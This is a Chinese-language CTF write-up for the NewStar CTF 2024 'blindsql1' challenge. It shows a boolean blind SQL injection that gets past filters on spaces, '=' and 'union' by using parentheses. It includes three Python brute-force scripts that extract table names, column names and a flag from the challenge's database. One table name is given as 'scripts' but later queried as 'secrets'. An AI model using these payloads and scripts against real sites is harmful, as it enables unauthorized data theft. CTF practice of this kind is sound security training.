NewStar blindsql1 web wp

参考官解：blindsql1 | WriteUp - NewStar CTF 2024

发现单引号闭合

输入空格，=，union,/发现都被过滤了

是个布尔盲注，多试几个，然后可以写sql看看

1	Alice'and((ord(mid((Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0,1)))in('a'))#

然后写脚本，这里我参考官解，然后解释一下几个易错点

char = f’(ord(mid({tables},{i},1)))这里这块table不能直接放进去

也就是说

1	char = f'(ord(mid((Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),{i},1)))'

是错的，可能跟f-string在本质上并不是字符串常量，而是一个在运行时运算求值的表达式有关，我也不大清楚


import requests,string,time

url = 'http://eci-2ze8beum9soff72dtw60.cloudeci1.ichunqiu.com/'

# Alice'and((ord(mid((Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0,1)))in('s'))#
# Alice' and ord(mid(select group_concat(table_name) from information_schema.tables where table_schema like database(),0,1)) in ('s')#
result = ''
for i in range(1,100):
    print(f'[+] Bruting at {i}')
    for c in string.ascii_letters + string.digits + '_-{}':
        time.sleep(0.01) # 限制速率，防止请求过快

        print('[+] Trying:', c)

        # 这条语句能查询到当前数据库所有的表名
        tables = f'(Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database())))'

        # 获取所有表名的第 i 个字符，并计算 ascii 值
        char = f'(ord(mid({tables},{i},1)))'

        # 爆破该 ascii 值
        b = f'(({char})in({ord(c)}))'

        # 若 ascii 猜对了，则 and 后面的结果是 true，会返回 Alice 的数据
        p = f'Alice\'and({b})#'

        res = requests.get(url, params={'student_name': p})

        if 'Alice' in res.text:
            print('[*]bingo:',c)
            result += c
            print(result)
            break

得到了几个表，student,scripts，course，然后可以看看scripts有哪几个column


import requests,string,time

url = 'http://eci-2ze28vznmioh3wal07jw.cloudeci1.ichunqiu.com:80'

# Alice'and((ord(mid((Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0,1)))in('s'))#
# Alice' and ord(mid(select group_concat(table_name) from information_schema.tables where table_schema like database(),0,1)) in ('s')#
result = ''
for i in range(1,100):
    print(f'[+] Bruting at {i}')
    for c in string.ascii_letters + string.digits + '_-{}':
        time.sleep(0.01) # 限制速率，防止请求过快

        print('[+] Trying:', c)

        # 这条语句能查询到当前数据库所有的表名
        tables = f'(Select(group_concat(column_name))from(information_schema.columns)where((table_name)like(\'secrets\')))'

        # 获取所有表名的第 i 个字符，并计算 ascii 值
        char = f'(ord(mid({tables},{i},1)))'

        # 爆破该 ascii 值
        b = f'(({char})in({ord(c)}))'

        # 若 ascii 猜对了，则 and 后面的结果是 true，会返回 Alice 的数据
        p = f'Alice\'and({b})#'

        res = requests.get(url, params={'student_name': p})

        if 'Alice' in res.text:
            print('[*]bingo:',c)
            result += c
            print(result)
            break

得id,secret_key,secret_value


import requests,string,time

url = 'http://eci-2ze28vznmioh3wal07jw.cloudeci1.ichunqiu.com:80'

# Alice'and((ord(mid((Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0,1)))in('s'))#
# Alice' and ord(mid(select group_concat(table_name) from information_schema.tables where table_schema like database(),0,1)) in ('s')#
result = ''
for i in range(1,100):
    print(f'[+] Bruting at {i}')
    for c in string.ascii_letters + string.digits + '_-{}':
        time.sleep(0.01) # 限制速率，防止请求过快

        print('[+] Trying:', c)

        # 这条语句能查询到当前数据库所有的表名
        tables = f'(Select(group_concat(secret_value))from(secrets)where((secret_value)like(\'flag%\')))'

        # 获取所有表名的第 i 个字符，并计算 ascii 值
        char = f'(ord(mid({tables},{i},1)))'

        # 爆破该 ascii 值
        b = f'(({char})in({ord(c)}))'

        # 若 ascii 猜对了，则 and 后面的结果是 true，会返回 Alice 的数据
        p = f'Alice\'and({b})#'

        res = requests.get(url, params={'student_name': p})

        if 'Alice' in res.text:
            print('[*]bingo:',c)
            result += c
            print(result)
            break